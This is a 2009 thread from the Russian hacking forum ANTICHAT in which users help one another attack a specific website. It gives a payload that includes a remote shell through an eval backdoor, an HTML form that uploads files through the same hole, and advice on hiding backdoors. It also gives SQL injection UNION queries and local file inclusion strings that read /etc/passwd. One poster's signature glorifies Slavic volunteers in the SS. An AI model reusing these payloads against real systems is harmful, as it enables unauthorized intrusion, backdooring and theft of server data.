ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
09.12.2009, 17:48
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
eval позволяет выполнять php-код, ls - никакого отношения к php не имеет. Вывод - нужно написать PHP-код, с помощью которого можно будет залить шелл.
Например, если после просмотра phpinfo() там будет allow_url_include = ON, то можно так залить шелл:
confgs.php?e=include('http://site/shell.txt');
|
|
|
09.12.2009, 18:19
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Сообщение от Pashkela
eval позволяет выполнять php-код, ls - никакого отношения к php не имеет. Вывод - нужно написать PHP-код, с помощью которого можно будет залить шелл.
Например, если после просмотра phpinfo() там будет allow_url_include = ON, то можно так залить шелл:
confgs.php?e=include('http://site/shell.txt');
Оо ну это все понятно а если confgs.php?e=system('ls -lia /путь/какой/нибудь'); не как? 
ЗЫ а там вообще WIN вместо ls у него dir вроде
Как залить шелл, например WSO, если я имею такой шелл <?php eval($_GET['c']) ?>
старайся всегда делать Как залить шелл, например WSO, если я имею такой шелл <?php eval(stripslashes($_GET['c'])); ?> ибо MQ = On может помешать и то что написал пашкела про include('http://site/shell.txt')
и если Magic_quotes = on то он его побреет этот запрос , или я не прав
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
Последний раз редактировалось HAXTA4OK; 09.12.2009 в 18:27..
|
|
|
|
09.12.2009, 18:27
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
какие ls,pwd внимательнее:
OC win , стоит VertrigoServ
создай на своем компе:
<form enctype=multipart/form-data method=post action="http://lala/confgs.php?e=$f=$_FILES[x];copy($f[tmp_name],$f[name]);"><input type=file name=x><input type=submit></form>
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
Последний раз редактировалось l1ght; 09.12.2009 в 18:40..
|
|
|
|
09.12.2009, 18:29
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Сообщение от HAXTA4OK
Оо ну это все понятно а если confgs.php?e=system('ls -lia /путь/какой/нибудь'); не как?
ЗЫ а там вообще WIN вместо ls у него dir вроде
старайся всегда делать Как залить шелл, например WSO, если я имею такой шелл <?php eval(stripslashes($_GET['c'])); ?> ибо MQ = On может помешать и то что написал пашкела про include('http://site/shell.txt')
и если Magic_quotes = on то он его побреет этот запрос , или я не прав magic_quotes_gpc On On 
Сообщение от l1ght
какие ls,pwd внимательнее:
создай на своем компе:
А можно поподробние?
Последний раз редактировалось SeNaP; 09.12.2009 в 18:39..
|
|
|
|
09.12.2009, 18:30
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
делай тогда как l1ght говорит и на будущее всегда юзай stripslashes, как сказал HAXTA4OK
|
|
|
|
09.12.2009, 18:33
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Да, забыл уточнить, когда делаем шелл в скриптах через Eval, то как лучше делать ?
Eval(stripslashes());
или
Eval(base64_decode());
Что посоветуете из этого? Я склоняюсь ко второму варианту но... хз хз
|
|
|
|
09.12.2009, 18:50
|
|
Участник форума
Регистрация: 01.08.2009
Сообщений: 183
Провел на форуме:
1483264
Репутация:
131
|
|
Illegal mix of collations for operation 'UNION'
Данную ошибку выдаёт при запросе:
UNION+SELECT+1,2,3,4,5,6,7,8,9,table_name,11+from+ information_schema.tables--
|
|
|
|
09.12.2009, 18:54
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
Сообщение от Nightmarе
Да, забыл уточнить, когда делаем шелл в скриптах через Eval, то как лучше делать ?
Eval(stripslashes());
или
Eval(base64_decode());
Что посоветуете из этого? Я склоняюсь ко второму варианту но... хз хз
Лучше евалом не бекдорить, используй альтернативные функции, типа preg_replace(), `` и т.п. . А насчет твоих вариантов, не вижу каких-либо преимуществ base64_decode, лишняя морока только... Ты ведь постом будешь отправлять команды бекдору? 
Сообщение от DeluxeS
Данную ошибку выдаёт при запросе:
Код:
UNION+SELECT+1,2,3,4,5,6,7,8,9,unhex(hex(table_name)),11+from+ information_schema.tables--
P.S. кучу раз это уже описывалось
|
|
|
|
09.12.2009, 22:26
|
|
Новичок
Регистрация: 22.10.2009
Сообщений: 3
Провел на форуме:
101899
Репутация:
1
|
|
Здравствуйте.
есть вот такой код:
PHP код:
<?php
$lfi = $_GET['lfi'];
include ('page'.$lfi.'.php');
?>
возможно ли в данном случае проинклудить локальный фаил?(к примеру passwd). Если да то как?
и еще один момент:
PHP код:
<?php
if (file_exists('./path/'.$_GET['lfi'].'.php')) {
include ('./path/'.$_GET['lfi'].'.php');
}
?>
так же интересует возможность инклуда произвольного файла.
Пытаюсь отсечь расширение с помощью %00, ? и т.п. не помогает.
Последний раз редактировалось eliteload; 09.12.2009 в 22:28..
|
|
|
|
09.12.2009, 22:37
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Сообщение от eliteload
Здравствуйте.
есть вот такой код:
PHP код:
<?php
$lfi = $_GET['lfi'];
include ('page'.$lfi.'.php');
?>
возможно ли в данном случае проинклудить локальный фаил?(к примеру passwd). Если да то как?
и еще один момент:
PHP код:
<?php
if (file_exists('./path/'.$_GET['lfi'].'.php')) {
include ('./path/'.$_GET['lfi'].'.php');
}
?>
так же интересует возможность инклуда произвольного файла.
Пытаюсь отсечь расширение с помощью %00, ? и т.п. не помогает.
?lfi=../../../../../../../etc/passwd%00
ИЛИ
?lfi=../../../../../../../etc/passwd///////[4096 раз /]///////////
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
